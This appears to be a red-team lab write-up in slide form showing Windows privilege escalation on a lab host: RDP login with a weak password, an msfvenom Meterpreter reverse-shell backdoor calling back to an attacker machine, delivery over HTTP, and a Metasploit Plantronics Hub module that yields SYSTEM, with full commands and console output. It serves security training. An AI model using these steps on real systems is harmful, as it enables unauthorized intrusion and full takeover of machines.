---
title: 0509-Red-Team-PT # presentation name
tags: 0509-Red-Team-PT # presentation tags
slideOptions:
  # spotlight:
  #   enabled: true
---

{%hackmd theme-dark %}

# 0509-Red-Team-Windows Privilege Escalation

### Jeff

### Target machine: 10.99.62.12

### 1. Port 3389 is open: RDP in

* Account: test1
* Password: 123456

![](https://i.imgur.com/eKAPLc8.jpg)

### 2. Look for a vulnerability to escalate with

* Plantronics Hub 3.13.2 is installed; this version has a known local privilege-escalation vulnerability in its SpokesUpdateService, which is what the Metasploit module in step 4 targets.

![](https://i.imgur.com/FNuIPdk.jpg)

### 3. Exploit

* (1) The local privesc module in msfconsole needs an existing session on the target, so first get a foothold shell as `test1`.
* Build the backdoor with msfvenom. This is a staged Meterpreter calling back to the attacker box on port 9999; `-f exe` produces a 32-bit binary, which is why the session later reports `x86/windows` on an x64 host:

```bash=
msfvenom -p windows/meterpreter/reverse_tcp lhost=10.99.62.253 lport=9999 -f exe > /tmp/jeff_backdoor.exe
```

* Deliver it to the target: serve the directory holding the backdoor over HTTP from the attacker box and fetch it on the target through the RDP session from step 1. `SimpleHTTPServer` is the Python 2 module; on Python 3 the equivalent is `python3 -m http.server 8888`:

```bash=
cd /tmp
python -m SimpleHTTPServer 8888
```

* Run the backdoor on the target:

![](https://i.imgur.com/bhaR3rE.jpg)

* (2) Set up the handler in msfconsole so the attacker box is listening before the backdoor runs. The payload, `LHOST` and `LPORT` must match what was baked into the executable; the handler's `LPORT` defaults to 4444, which is why it has to be reset to 9999 (visible in the output below):

```bash=
msfconsole -q
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 10.99.62.253
set lport 9999
run
```

* Result:

```=
msf5 exploit(multi/handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     10.99.62.253     yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf5 exploit(multi/handler) > set lport 9999
lport => 9999
msf5 exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.99.62.253:9999
[*] Sending stage (180291 bytes) to 10.99.62.12
[*] Meterpreter session 1 opened (10.99.62.253:9999 -> 10.99.62.12:49990) at 2020-05-09 01:56:49 -0400

meterpreter > sysinfo
Computer        : DESKTOP-CLHVC1L
OS              : Windows 10 (10.0 Build 18362).
Architecture    : x64
System Language : zh_TW
Domain          : WORKGROUP
Logged On Users : 4
Meterpreter     : x86/windows
meterpreter > getuid
Server username: DESKTOP-CLHVC1L\test1
```

### 4. Privilege escalation

* New tricks learned:
  * `bg` (background): drop the live Meterpreter session into the background and return to the `msf5` prompt, so a local module can be run against it.

```=
meterpreter > bg
[*] Backgrounding session 1...
```

  * `options` is a short alias for `show options`. Saves keystrokes XD
* Privesc module: `exploit/windows/local/plantronics_hub_spokesupdateservice_privesc` in msfconsole.
* Preparation: find the session ID to attach the module to with `sessions -l`, then `use` the module and `set SESSION` to that ID. The module starts its own payload handler, which defaults to `LPORT 4444`, so the SYSTEM shell comes back on a different port and as a new session while the `test1` session stays open; keep 4444 free (or set a different `LPORT`) so the bind does not clash with the handler from step 3.

```=
msf5 exploit(multi/handler) > sessions -l

Active sessions
===============

  Id  Name  Type                     Information                              Connection
  --  ----  ----                     -----------                              ----------
  2         meterpreter x86/windows  DESKTOP-CLHVC1L\test1 @ DESKTOP-CLHVC1L  10.99.62.253:9999 -> 10.99.62.12:49990 (10.99.62.12)
```

```=
msf5 exploit(windows/local/plantronics_hub_spokesupdateservice_privesc) > sessions -l

Active sessions
===============

  Id  Name  Type                     Information                              Connection
  --  ----  ----                     -----------                              ----------
  2         meterpreter x86/windows  DESKTOP-CLHVC1L\test1 @ DESKTOP-CLHVC1L  10.99.62.253:9999 -> 10.99.62.12:49865 (10.99.62.12)

msf5 exploit(windows/local/plantronics_hub_spokesupdateservice_privesc) > show options

Module options (exploit/windows/local/plantronics_hub_spokesupdateservice_privesc):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION  2                yes       The session to run this module on.


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     10.99.62.253     yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf5 exploit(windows/local/plantronics_hub_spokesupdateservice_privesc) > run

[*] Started reverse TCP handler on 10.99.62.253:4444
[*] Sending stage (180291 bytes) to 10.99.62.12
[*] Meterpreter session 5 opened (10.99.62.253:4444 -> 10.99.62.12:49981) at 2020-05-09 01:49:02 -0400

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >
```

* Check: `getuid` in the new session returns `NT AUTHORITY\SYSTEM`, so the escalation from `test1` worked.